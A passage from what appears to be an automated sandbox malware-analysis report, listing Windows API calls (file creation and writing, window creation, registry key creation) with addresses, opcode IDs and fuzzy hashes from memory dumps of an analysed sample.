                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3319771486-0
                                                                                        • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                        • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                        • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                        • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                        • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                        • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                        • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                        APIs
                                                                                        • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                        • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                        • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                        • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                        • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                        • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                        • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                        • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                        • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                        • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                        • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                        • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                        • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                        APIs
                                                                                        • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage
                                                                                        • String ID:
                                                                                        • API String ID: 1306739567-0
                                                                                        • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                        • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                        • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                        • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                        APIs
                                                                                        • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExtentPointText
                                                                                        • String ID:
                                                                                        • API String ID: 566491939-0
                                                                                        • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                        • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                        • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                        • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                        APIs
                                                                                        • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                        • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                        • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                        • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                        APIs
                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                        • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                        • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                        • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                        APIs
                                                                                        • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 1863332320-0
                                                                                        • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                        • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                        • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                        • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                        • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                        • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                        • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                        • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                        • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                        • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                        APIs
                                                                                          • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                        • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                          • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3202724764-0
                                                                                        • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                        • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                        • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                        • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                        APIs
                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: TextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 530164218-0
                                                                                        • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                        • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                        • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                        • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                        • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                        • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                        • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                        • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                        • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                        • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                        • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                        • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                        • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                        APIs
                                                                                        • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                          • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
